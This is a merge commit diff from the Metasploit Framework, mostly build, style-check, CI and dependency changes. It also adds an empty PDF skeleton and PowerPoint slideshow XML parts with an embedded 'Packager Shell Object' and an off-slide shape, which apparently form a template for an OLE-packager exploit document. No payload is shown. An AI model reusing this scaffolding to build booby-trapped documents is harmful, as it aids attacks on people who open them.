Merge branch 'upstream-master' into land-3175

bug/bundler_fix
Brent Cook 2014-12-11 22:03:03 -06:00
commit 8140ed4a45
544 changed files with 24509 additions and 18637 deletions

10
.gitignore vendored
View File

@ -7,6 +7,12 @@ Gemfile.local.lock
.sublime-project .sublime-project
# RVM control file, keep this to avoid backdooring Metasploit # RVM control file, keep this to avoid backdooring Metasploit
.rvmrc .rvmrc
# Allow for a local choice of (unsupported / semi-supported) ruby versions
# See PR #4136 for usage, but example usage for rvm:
# rvm --create --versions-conf use 2.1.4@metasploit-framework
# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
# rbenv shell 2.1.4
.versions.conf
# YARD cache directory # YARD cache directory
.yardoc .yardoc
# Mac OS X files # Mac OS X files
@ -77,3 +83,7 @@ data/meterpreter/screenshot.*.dll
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: http://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty

View File

@ -8,7 +8,7 @@
# inherit_from: .rubocop_todo.yml # inherit_from: .rubocop_todo.yml
Style/ClassLength: Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.' Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true Enabled: true
Exclude: Exclude:
@ -25,14 +25,14 @@ Style/Encoding:
Description: 'We prefer binary to UTF-8.' Description: 'We prefer binary to UTF-8.'
EnforcedStyle: 'when_needed' EnforcedStyle: 'when_needed'
Style/LineLength: Metrics/LineLength:
Description: >- Description: >-
Metasploit modules often pattern match against very Metasploit modules often pattern match against very
long strings when identifying targets. long strings when identifying targets.
Enabled: true Enabled: true
Max: 180 Max: 180
Style/MethodLength: Metrics/MethodLength:
Enabled: true Enabled: true
Description: >- Description: >-
While the style guide suggests 10 lines, exploit definitions While the style guide suggests 10 lines, exploit definitions
@ -44,6 +44,11 @@ Style/MethodLength:
Style/Encoding: Style/Encoding:
Enabled: false Enabled: false
# %q() is super useful for long strings split over multiple lines and
# is very common in module constructors for things like descriptions
Style/UnneededPercentQ:
Enabled: false
Style/NumericLiterals: Style/NumericLiterals:
Enabled: false Enabled: false
Description: 'This often hurts readability for exploit-ish code.' Description: 'This often hurts readability for exploit-ish code.'

View File

@ -1 +1 @@
1.9.3-p547 1.9.3-p551

View File

@ -1,9 +1,13 @@
env: env:
- RAKE_TASK=cucumber - RAKE_TASK=cucumber
- RAKE_TASK=cucumber:boot # Commenting out the boot tests due to chronic timeouts.
- RAKE_TASK=spec # - RAKE_TASK=cucumber:boot
- RAKE_TASK=spec SPEC_OPTS="--tag content"
- RAKE_TASK=spec SPEC_OPTS="--tag ~content"
language: ruby language: ruby
matrix:
fast_finish: true
before_install: before_install:
- rake --version - rake --version
- sudo apt-get update -qq - sudo apt-get update -qq
@ -19,14 +23,22 @@ before_script:
- bundle exec rake --version - bundle exec rake --version
- bundle exec rake db:create - bundle exec rake db:create
- bundle exec rake db:migrate - bundle exec rake db:migrate
script: "bundle exec rake $RAKE_TASK" script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code && bundle exec rake $RAKE_TASK
rvm: rvm:
#- '1.8.7'
- '1.9.3' - '1.9.3'
- '2.1'
notifications: notifications:
irc: "irc.freenode.org#msfnotify" irc: "irc.freenode.org#msfnotify"
git: git:
depth: 5 depth: 5
# Blacklist certain branches from triggering travis builds
branches:
except:
- gh-pages
- metakitty

View File

@ -37,8 +37,10 @@ and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-f
## Code Contributions ## Code Contributions
* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide). * **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
* *Do* get [Rubocop](https://rubygems.org/search?query=rubocop) relatively quiet against the code you are adding or modifying. * **Do** get [Rubocop](https://rubygems.org/search?query=rubocop) relatively quiet against the code you are adding or modifying.
* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages. * **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
* **Don't** use the default merge messages when merging from other
branches.
* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`. * **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
### Pull Requests ### Pull Requests

View File

@ -1,4 +1,4 @@
Copyright (C) 2006-2013, Rapid7, Inc. Copyright (C) 2006-2014, Rapid7, Inc.
All rights reserved. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, Redistribution and use in source and binary forms, with or without modification,

16
Gemfile
View File

@ -1,18 +1,10 @@
source 'https://rubygems.org' source 'https://rubygems.org'
# Add default group gems to `metasploit-framework.gemspec`: # Add default group gems to `metasploit-framework.gemspec`:
# spec.add_runtime_dependency '<name>', [<version requirements>] # spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec gemspec name: 'metasploit-framework'
group :db do group :db do
# Needed for Msf::DbManager gemspec name: 'metasploit-framework-db'
gem 'activerecord', '>= 3.0.0', '< 4.0.0'
# Metasploit::Credential database models
gem 'metasploit-credential', '~> 0.12.0'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.21.1'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end end
group :development do group :development do
@ -43,9 +35,7 @@ group :development, :test do
end end
group :pcap do group :pcap do
gem 'network_interface', '~> 0.0.1' gemspec name: 'metasploit-framework-pcap'
# For sniffer and raw socket modules
gem 'pcaprub'
end end
group :test do group :test do

View File

@ -9,16 +9,27 @@ PATH
json json
metasploit-concern (~> 0.3.0) metasploit-concern (~> 0.3.0)
metasploit-model (~> 0.28.0) metasploit-model (~> 0.28.0)
meterpreter_bins (= 0.0.10) meterpreter_bins (= 0.0.11)
msgpack msgpack
nokogiri nokogiri
packetfu (= 1.1.9) packetfu (= 1.1.9)
railties railties
rb-readline
recog (~> 1.0) recog (~> 1.0)
robots robots
rubyzip (~> 1.1) rubyzip (~> 1.1)
sqlite3 sqlite3
tzinfo tzinfo
metasploit-framework-db (4.10.1.pre.dev)
activerecord (< 4.0.0)
metasploit-credential (~> 0.13.6)
metasploit-framework (= 4.10.1.pre.dev)
metasploit_data_models (~> 0.21.1)
pg (>= 0.11)
metasploit-framework-pcap (4.10.1.pre.dev)
metasploit-framework (= 4.10.1.pre.dev)
network_interface (~> 0.0.1)
pcaprub
GEM GEM
remote: https://rubygems.org/ remote: https://rubygems.org/
@ -51,13 +62,13 @@ GEM
i18n (~> 0.6, >= 0.6.4) i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0) multi_json (~> 1.0)
arel (3.0.3) arel (3.0.3)
arel-helpers (2.0.1) arel-helpers (2.0.2)
activerecord (>= 3.1.0, < 5) activerecord (>= 3.1.0, < 5)
aruba (0.6.1) aruba (0.6.1)
childprocess (>= 0.3.6) childprocess (>= 0.3.6)
cucumber (>= 1.1.1) cucumber (>= 1.1.1)
rspec-expectations (>= 2.7.0) rspec-expectations (>= 2.7.0)
bcrypt (3.1.7) bcrypt (3.1.9)
builder (3.0.4) builder (3.0.4)
capybara (2.4.1) capybara (2.4.1)
mime-types (>= 1.16) mime-types (>= 1.16)
@ -101,7 +112,7 @@ GEM
metasploit-concern (0.3.0) metasploit-concern (0.3.0)
activesupport (~> 3.0, >= 3.0.0) activesupport (~> 3.0, >= 3.0.0)
railties (< 4.0.0) railties (< 4.0.0)
metasploit-credential (0.12.0) metasploit-credential (0.13.6)
metasploit-concern (~> 0.3.0) metasploit-concern (~> 0.3.0)
metasploit-model (~> 0.28.0) metasploit-model (~> 0.28.0)
metasploit_data_models (~> 0.21.0) metasploit_data_models (~> 0.21.0)
@ -112,7 +123,7 @@ GEM
metasploit-model (0.28.0) metasploit-model (0.28.0)
activesupport activesupport
railties (< 4.0.0) railties (< 4.0.0)
metasploit_data_models (0.21.1) metasploit_data_models (0.21.2)
activerecord (>= 3.2.13, < 4.0.0) activerecord (>= 3.2.13, < 4.0.0)
activesupport activesupport
arel-helpers arel-helpers
@ -121,15 +132,15 @@ GEM
pg pg
railties (< 4.0.0) railties (< 4.0.0)
recog (~> 1.0) recog (~> 1.0)
meterpreter_bins (0.0.10) meterpreter_bins (0.0.11)
method_source (0.8.2) method_source (0.8.2)
mime-types (1.25.1) mime-types (1.25.1)
mini_portile (0.6.0) mini_portile (0.6.1)
msgpack (0.5.9) msgpack (0.5.9)
multi_json (1.0.4) multi_json (1.0.4)
network_interface (0.0.1) network_interface (0.0.1)
nokogiri (1.6.3.1) nokogiri (1.6.5)
mini_portile (= 0.6.0) mini_portile (~> 0.6.0)
packetfu (1.1.9) packetfu (1.1.9)
pcaprub (0.11.3) pcaprub (0.11.3)
pg (0.17.1) pg (0.17.1)
@ -160,10 +171,11 @@ GEM
rake (>= 0.8.7) rake (>= 0.8.7)
rdoc (~> 3.4) rdoc (~> 3.4)
thor (>= 0.14.6, < 2.0) thor (>= 0.14.6, < 2.0)
rake (10.3.2) rake (10.4.2)
rb-readline (0.5.1)
rdoc (3.12.2) rdoc (3.12.2)
json (~> 1.4) json (~> 1.4)
recog (1.0.0) recog (1.0.6)
nokogiri nokogiri
redcarpet (3.1.2) redcarpet (3.1.2)
rkelly-remix (0.0.6) rkelly-remix (0.0.6)
@ -195,19 +207,19 @@ GEM
simplecov-html (~> 0.5.3) simplecov-html (~> 0.5.3)
simplecov-html (0.5.3) simplecov-html (0.5.3)
slop (3.6.0) slop (3.6.0)
sprockets (2.2.2) sprockets (2.2.3)
hike (~> 1.2) hike (~> 1.2)
multi_json (~> 1.0) multi_json (~> 1.0)
rack (~> 1.0) rack (~> 1.0)
tilt (~> 1.1, != 1.3.0) tilt (~> 1.1, != 1.3.0)
sqlite3 (1.3.9) sqlite3 (1.3.10)
thor (0.19.1) thor (0.19.1)
tilt (1.4.1) tilt (1.4.1)
timecop (0.7.1) timecop (0.7.1)
treetop (1.4.15) treetop (1.4.15)
polyglot polyglot
polyglot (>= 0.3.1) polyglot (>= 0.3.1)
tzinfo (0.3.41) tzinfo (0.3.42)
xpath (2.0.0) xpath (2.0.0)
nokogiri (~> 1.3) nokogiri (~> 1.3)
yard (0.8.7.4) yard (0.8.7.4)
@ -216,18 +228,14 @@ PLATFORMS
ruby ruby
DEPENDENCIES DEPENDENCIES
activerecord (>= 3.0.0, < 4.0.0)
aruba aruba
cucumber-rails cucumber-rails
factory_girl (>= 4.1.0) factory_girl (>= 4.1.0)
factory_girl_rails factory_girl_rails
fivemat (= 1.2.1) fivemat (= 1.2.1)
metasploit-credential (~> 0.12.0)
metasploit-framework! metasploit-framework!
metasploit_data_models (~> 0.21.1) metasploit-framework-db!
network_interface (~> 0.0.1) metasploit-framework-pcap!
pcaprub
pg (>= 0.11)
pry pry
rake (>= 10.0.0) rake (>= 10.0.0)
redcarpet redcarpet

View File

@ -1,6 +1,7 @@
#!/usr/bin/env rake #!/usr/bin/env rake
require File.expand_path('../config/application', __FILE__) require File.expand_path('../config/application', __FILE__)
require 'metasploit/framework/require' require 'metasploit/framework/require'
require 'metasploit/framework/spec/untested_payloads'
# @note must be before `Metasploit::Framework::Application.load_tasks` # @note must be before `Metasploit::Framework::Application.load_tasks`
# #
@ -9,3 +10,6 @@ require 'metasploit/framework/require'
Metasploit::Framework::Require.optionally_active_record_railtie Metasploit::Framework::Require.optionally_active_record_railtie
Metasploit::Framework::Application.load_tasks Metasploit::Framework::Application.load_tasks
Metasploit::Framework::Spec::Constants.define_task
Metasploit::Framework::Spec::Threads::Suite.define_task
Metasploit::Framework::Spec::UntestedPayloads.define_task

View File

@ -23,15 +23,13 @@ unless ENV['BUNDLE_GEMFILE']
end end
begin begin
require 'bundler' require 'bundler/setup'
rescue LoadError rescue LoadError
$stderr.puts "[*] Metasploit requires the Bundler gem to be installed" $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
$stderr.puts " $ gem install bundler" $stderr.puts " $ gem install bundler"
exit(0) exit(1)
end end
Bundler.setup
lib_path = root.join('lib').to_path lib_path = root.join('lib').to_path
unless $LOAD_PATH.include? lib_path unless $LOAD_PATH.include? lib_path

View File

@ -0,0 +1,55 @@
%PDF-1.0
1 0 obj
<<
/Pages 2 0 R
/Type /Catalog
>>
endobj
2 0 obj
<<
/Count 1
/Kids [ 3 0 R ]
/Type /Pages
>>
endobj
3 0 obj
<<
/Contents 4 0 R
/Parent 2 0 R
/Resources <<
/Font <<
/F1 <<
/Type /Font
/Subtype /Type1
/BaseFont /Helvetica
/Name /F1
>>
>>
>>
/Type /Page
/MediaBox [ 0 0 795 842 ]
>>
endobj
4 0 obj
<<
/Length 0
>>stream
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000067 00000 n
0000000136 00000 n
0000000373 00000 n
trailer
<<
/Root 1 0 R
/Size 5
/Info 0 0 R
>>
startxref
429
%%EOF

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>37</TotalTime><Words>2</Words><Application>Microsoft Office PowerPoint</Application><PresentationFormat>On-screen Show (4:3)</PresentationFormat><Paragraphs>2</Paragraphs><Slides>1</Slides><Notes>0</Notes><HiddenSlides>0</HiddenSlides><MMClips>0</MMClips><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="6" baseType="variant"><vt:variant><vt:lpstr>Theme</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Embedded OLE Servers</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Slide Titles</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="3" baseType="lpstr"><vt:lpstr>Office Theme</vt:lpstr><vt:lpstr>Packager Shell Object</vt:lpstr><vt:lpstr>Example</vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title>Example</dc:title><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>9</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2014-08-06T07:56:10Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-12T06:36:10Z</dcterms:modified></cp:coreProperties>

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.0 KiB

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

View File

@ -0,0 +1,31 @@
<xml xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:p="urn:schemas-microsoft-com:office:powerpoint"
xmlns:oa="urn:schemas-microsoft-com:office:activation">
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75"
o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_s1034" type="#_x0000_t75" style='position:absolute;left:100pt;top:-100pt;width:30pt;height:30pt'>
<v:fill color="white" opacity="1" on="f" type="solid"/>
<v:stroke on="f"/>
<v:imagedata o:relid="rId1" o:title="" croptop="0" cropbottom="0" cropleft="0"
cropright="0" grayscale="f" bilevel="f"/>
<o:lock v:ext="edit" aspectratio="t" position="f" selection="f" grouping="f"/>
</v:shape></xml>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentationPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:extLst><p:ext uri="{E76CE94A-603C-4142-B9EB-6D1370010A27}"><p14:discardImageEditData xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="0"/></p:ext><p:ext uri="{D31A062A-798A-4329-ABDD-BBA856620510}"><p14:defaultImageDpi xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220"/></p:ext><p:ext uri="{FD5EFAAD-0ECE-453E-9831-46B23BE46B34}"><p15:chartTrackingRefBased xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="" val="0"/></p:ext></p:extLst></p:presentationPr>

View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" saveSubsetFonts="1"><p:sldMasterIdLst><p:sldMasterId id="2147483648" r:id="rId1"/></p:sldMasterIdLst><p:sldIdLst><p:sldId id="256" r:id="rId2"/></p:sldIdLst><p:sldSz cx="9144000" cy="6858000" type="screen4x3"/><p:notesSz cx="6858000" cy="9144000"/><p:defaultTextStyle><a:defPPr><a:defRPr lang="en-US"/></a:defPPr><a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl9pPr></p:defaultTextStyle><p:extLst><p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}"><p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
<p15:guide id="1" orient="horz" pos="2160">
<p15:clr>
<a:srgbClr val="A4A3A4"/>
</p15:clr>
</p15:guide>
<p15:guide id="2" pos="2880">
<p15:clr>
<a:srgbClr val="A4A3A4"/>
</p15:clr>
</p15:guide>
</p15:sldGuideLst></p:ext></p:extLst></p:presentation>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
